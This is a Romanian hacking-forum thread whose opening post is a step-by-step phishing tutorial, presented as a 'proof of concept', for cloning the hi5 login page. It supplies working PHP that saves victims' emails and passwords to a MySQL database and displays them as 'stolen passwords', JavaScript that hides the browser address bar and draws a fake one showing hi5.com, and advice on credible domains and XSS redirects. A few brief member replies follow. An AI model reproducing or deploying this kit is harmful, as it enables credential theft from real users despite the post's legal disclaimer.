www.Hacking-Romania.com
Hacking, gaby hacker team, programe hack, radmin hack, hi5 hack, hack the west, hacking romania, hacking stuff, hacking tools, 1 hack, 1st hacks, 2 hack, 2 hacks, 3 hack, 3 hacks, 3000 hack, 3004 hack, 4 hack, 4 hacks, 55 hack, 6 hack, 6 hacks, 7 hack, 7 hacks, 9 hack, 9dragons hack, a hack, adventure quest hack, aim hack, alz hack, and hacks, best hack, blue hack, bots hack, bots hacks, buy hack, cabal online hack, chaos hacks, cheat engine hack, cheat hack, cheats and hacks, cheats hacks, city hack, club hack, combo hack, conquer hacks, conquer online hack, conquer online hacks, conquer speed hack, conquiztador hack, counter strike 1.6 hack, damage hack, de hack, download hack, download hack for, dragonfable hack, dragonfable hacks, drakkarious hack, exp hack, flyff hack, free hack, free hacks, game hack, game hacks, garena exp hack, gladiatus hack, gm hack, gold hack, gunz hack, hack, hack 5, hack a pc, hack a site, hack a website, hack blog, hack conquer, hack counter strike, hack crack, hack cs, hack cs 1.6, hack dvd, hack email, hack forum, hack hunter, hack id, hack info, hack it, hack mess, hack muonline, hack net, hack password, hack passwords, hack pc, hack pdf, hack programs, hack site, hack sites, hack soft, hack software, hack team, hack the game, hack this, hack website, hack windows xp, hack world, hack xp, hacked, hacking, hacking game, hacking programs, hacking software, hacking tutorials, hacks, how hack, how to hack, icon hack, last chaos hack, last chaos hacks, life hack, lineage 2 hack, lineage 2 hacks, linux hack, lvl hack, maplestory hacks, mobile hack, multi hack 3.0, mybrute hack, naruto arena hack, naruto arena hacks, one hit kill hack, online hacks, perfect world hacks, pool hack, programe hack, resolution hack, resource hack, roll hack, royal hack, silkroad hack, source hack, speed hack, speed hacks, super hack, the west hack, warrock hack, warrock hacks, web hack, xpango hack, lockerz forum 		Lista Forumurilor Pe Tematici
www.Hacking-Romania.com | Reguli | Inregistrare | Login

POZE WWW.HACKING-ROMANIA.COM

Nu sunteti logat. 		Nou pe simpatie:
dannutzza la Simpatie.ro
Femeie
25 ani
Mehedinti
cauta Barbat
25 - 52 ani
www.Hacking-Romania.com / Hacking-ul nostru cel de toate zilele / Phishing - PoC  
Autor
Mesaj Pagini: 1
948Y-H4(K3R
☻ADM!N☻

Inregistrat: acum 17 ani
Postari: 2716
Phishing reprezintă o formă de activitate criminală care constă in obţinerea datelor confidenţiale, cum ar fi date de acces pentru aplicaţii de tip bancar, aplicaţii de trading (De exemplu: E-bay, PayPal) sau informaţii referitoare la cărţi de credit, folosind tehnici de manipulare a identităţii unei persoane sau a unei instituţii.

In primul rand , vreau sa va spun ca am facut acest site de phishing nu pentru a fura parolele altor useri deoarece numi pasa, si nici voua nu ar trebui, deoarece fiecare are dreptul la intimitatea lui si nici voua nu cred ca v-ar placea sa intre cineva pe mail/ orice alt cont al vostru.
Acest tutorial este un PoC( Proof of concept) si va spun ca phishingul este ilegal si nu indemn pe nimeni sal foloseasca, ceea ce faceti voi cu acest tutorial faceti pe propria vostra raspundere.

Am vazut pe net multe pagini de phishing, dar nici una nu mi sa parut perfecta sau macar aproape de perfectiune, si am ajuns la concluzia ca daca vrei ceva facut bine trebuie sa il faci cu mana ta deci:

1. prima etapa este sa copiezi codul sursa al paginei pe care vrei sa o reproduci. Eu va recomant sa dati save page as->html and images. Ca exemplu eu am luat o pagina de hi5.

2.codul sursa trebuie modificat pentru ca pagina sa poata fie folosita si daca se afla pe un alt host decat celelalte fisiere. Deci va uitati prin codul sursa si unde vedeti ceva de genul : <a href="/friend/Ploiesti--TopCities-html" class="smallTag">Ploiesti</a>&nbsp;
inlocuiti cu <a href="http://www.hi5.com/friend/Ploiesti--TopCities-html" class="smallTag">Ploiesti</a>&nbsp;
Aveti destul de modificat .. dar daca vreti sa fie perfect trebui sa aveti rabdare

3.Urmatorul pas este sa faceti ca parolele trimise de user sa ajunga si la voi si la hi5, pentru ca useri sa ajunga pe pagina lor de profil dupa logare.
Aceasta etapa este putin mai grea. Din cate am vazut pe internet majoritatea paginilor de scam trimit parolele pe email, dar dupa parerea mea este mai bine sa facem o baza de date mysql unde parolele sa se salveze.

Prima etapa este sa modificati <form name="loginForm" method="post" action="/friend/login.do">
in <FORM name=loginForm action=getpasswd.php method=post>

getpasswd.php
<?php

include("dbcon.php";
$email=$_POST["email"];
$passwd=$_POST["password"];


mysql_select_db("hi5",$con);
$query="INSERT INTO hack ( email , password ) VALUES ( '$email' , '$passwd' )";
mysql_query($query,$con);

?>
<form name=hack action="http://hi5.com/friend/login.do" method=post>
<input type=hidden name=email value=<?=$_POST["email"]?> >
<input type=hidden name=password value=<?=$_POST["password"]?> ><br>
</form>

<script>
function submitit(){
var form = document.hack;
form.submit();

}
</SCRIPT>
<script type="text/javascript">
submitit();
</script>


dbcon.php
<?php

$con = mysql_connect("mysql host","user","pass";
?>

inlocuiti mysql host cu url-u de la baza de date, useru si passu

Pentru a forma baza de date si tabelu mai faceti un php
setup.php
<?php
include("dbcon.php";
mysql_query("CREATE DATABASE hi5",$con);
mysql_select_db("hi5",$con);

$query="CREATE TABLE hack(
email varchar(60),
password varchar(60)
)";
mysql_query($query,$con);
?>

Pentru a vedea parolele salvate mai faceti un php
showpass.php
<?php
include("dbcon.php";
echo "passworduri furate <br>";
mysql_select_db("hi5",$con);
$query="SELECT * FROM hack ";
$result=mysql_query($query,$con);
while($row=mysql_fetch_array($result))
{echo $row["email"]." si parola ".$row["password"];
echo "<br>";
}
?>

La sfarsitul acestei etape va trebui sa aveti un index.html modificat, getpasswd.php, setup.php, dbcon.php, showpass.php in acelasi folder

4. Urmatorul pas si cel mai uitat in cazul paginilor de phishing este sa faceti ca pagina sa para cat mai credibila. Metoda mea este sa fac o pagina de index care iti deschide pagina care o vrei fara address bar, este foarte simplu:

index.html
<HTML><HEAD><TITLE>Hi5 Redirect</TITLE><script LANGUAGE="JavaScript">

<!-- Begin
function Start(page) {
OpenWin = this.open(page, "CtrlWindow", "ini,width=1003,height=750,scrollbars=yes,toolbar=yes,directories=yes,status
=yes,menubar=yes,resizable=yes";
}
// End -->
</SCRIPT>
</HEAD><meta http-equiv="Refresh" content="0;url=java script:Start('hi5.html')">
<p><font size="3">This page has moved, if you are not automatically forwarded to the new page, please <a href="java script:Start('hi5.html')">click here</a>.</font></p>

</html>

Astfel reusiti sa deschideti pagina voastra fara address bar, dar pentru a duce realismul un pas mai departe va trebui sa creati un address bar fals. Address baru este usor de facut, mai greu a fost sa fac ca address baru sa aiba o pozitie constanta, deci si daca dai scroll el sa ramana tot sus, acest lucru lam facut cu un script luat de pe internet cu floating content in care am inclus html-u de la address baru facut de mine

asta puneti chiar dupa <head>
<!--[if IE]>

<!--
Always On Top Content Script-
© Dynamic Drive )
For full source code, installation instructions,
100's more DHTML scripts, and Terms Of
Use, visit dynamicdrive.com
-->

<style>
<!--
.drag{position:relative;cursor:hand
}
#scontentmain{
position:absolute;
width:1000px;
}
#scontentbar{
cursor:hand;
position:absolute;
background-color:0;
height:15;
width:100%;
top:0;
}
#scontentsub{
position:absolute;
width:100%;
top:15;
background-color:lightyellow;
border:0;
padding:1.5px;
}
-->
</style>

<script language="JavaScript1.2">
<!--
//Drag and drop engine for static content
//© Dynamic Drive )

var dragapproved=false
var zcor,xcor,ycor

function ietruebody(){
return (document.compatMode && document.compatMode!="BackCompat"? document.documentElement : document.body
}

function movescontentmain(){
if (event.button==1&&dragapproved){
zcor.style.pixelLeft=tempvar1+event.clientX-xcor
zcor.style.pixelTop=tempvar2+event.clientY-ycor
leftpos=document.all.scontentmain.style.pixelLeft-ietruebody().scrollLeft
toppos=document.all.scontentmain.style.pixelTop-ietruebody().scrollTop
return false
}
}
function dragscontentmain(){
if (!document.all)
return
if (event.srcElement.id=="scontentbar"{
dragapproved=true
zcor=scontentmain
tempvar1=zcor.style.pixelLeft
tempvar2=zcor.style.pixelTop
xcor=event.clientX
ycor=event.clientY
document.onmousemove=movescontentmain
}
}
document.onmousedown=dragscontentmain
document.onmouseup=new Function("dragapproved=false"
//-->
</script>

<![endif]-->

si asta puneti chiar inainte de </body>

<!--[if IE]>
<div id="scontentmain">
<div id="scontentbar" >
<img align="right" src="barbutton.gif" onClick="onoffdisplay()">
</div>
<div id="scontentsub">


<body style='border:none' margin='0' leftmargin='0' rightmargin='0' topmargin='0' bottommargin='0'><table border='0' cellspacing='0' cellpadding='0' width='0' width='100%'><tr><td width='71' height='26'><img border='0' src='ie_locationbar1.bmp'/></td><td align='top' width='100%' height='26' style='background: #ffffff url(ie_locationbar2.bmp) no-repeat'><input name='url' style='border:none; width:100%;' value='http://www.hi5.com' onkeydown='if (document.all){if (event.keyCode == 13){event.returnValue=false;event.cancel = true;window.location=this.value;}}else if (document.getElementById){if (event.which == 13){event.returnValue=false;event.cancel = true;window.location=this.value;}}else if(document.layers){if(event.which == 13){event.returnValue=false;event.cancel = true;window.location=this.value;}}'></td><td width='80' height='26'><img border='0' src='ie_locationbar3.bmp'/></td></tr>

</div>
</div>
</div>


<script language="JavaScript1.2">

/*
Always On Top Content Script-
© Dynamic Drive )
For full source code, installation instructions,
100's more DHTML scripts, and Terms Of
Use, visit dynamicdrive.com
*/

//configure the below two variables to determine where the static content will initially be positioned when the document loads, in terms of X and Y cooridinates, respectively

var w=-500
var h=0


////Do not edit pass this line///////////
w+=ietruebody().scrollLeft
h+=ietruebody().scrollTop

var leftpos=w
var toppos=h
scontentmain.style.left=w
scontentmain.style.top=h

function onoffdisplay(){
if (scontentsub.style.display=='')
scontentsub.style.display='none'
else
scontentsub.style.display=''
}

function staticize(){
w2=ietruebody().scrollLeft+leftpos
h2=ietruebody().scrollTop+toppos
scontentmain.style.left=w2
scontentmain.style.top=h2
}
window.onscroll=staticize

</script>
<![endif]-->

Dupa aceasta etapa va trebui sa aveti un index.html unde va fi scriptu de deschide de pagina fara address bar, si un alt html unde veti include si scriptul de floating address bar.

PS: scriptul de floating address bar este doar pentru ie, si designul address barului este la fel, doar pentru ie

5. Urmatorul pass si la fel de important ca celalalt este sa aveti un link credibil, deci va trebui sa va gasiti un host cu baza de date mysql, suport php si cu un domeniu cat mai credibil

Daca doriti si stiti cum, puteti sa cautati pe pagina pe care vreti so reproduceti o vulnerabilitate xss si sa dati redirect pe pagina vostra, asta nu va voi explica.

multumesc prietenului meu alchimistul pentru scripturile php facute de el

Tot ceea ce faceti cu acest tutorial faceti pe raspunderea voastra.
pus acum 16 ani
   
spyon
Pe lista neagra

Inregistrat: acum 16 ani
Postari: 850
       

pus acum 16 ani
   
adry1986
MEMBRU ACTIV

Din: bacau
Inregistrat: acum 15 ani
Postari: 247
interesant!
pus acum 15 ani
   
skimmere
MEMBRU

Inregistrat: acum 15 ani
Postari: 151
da dar ai ceva de munca
dar eati bravo pentru ca te cred

Modificat de skimmere (acum 15 ani)
pus acum 15 ani
   
Pagini: 1  

Mergi la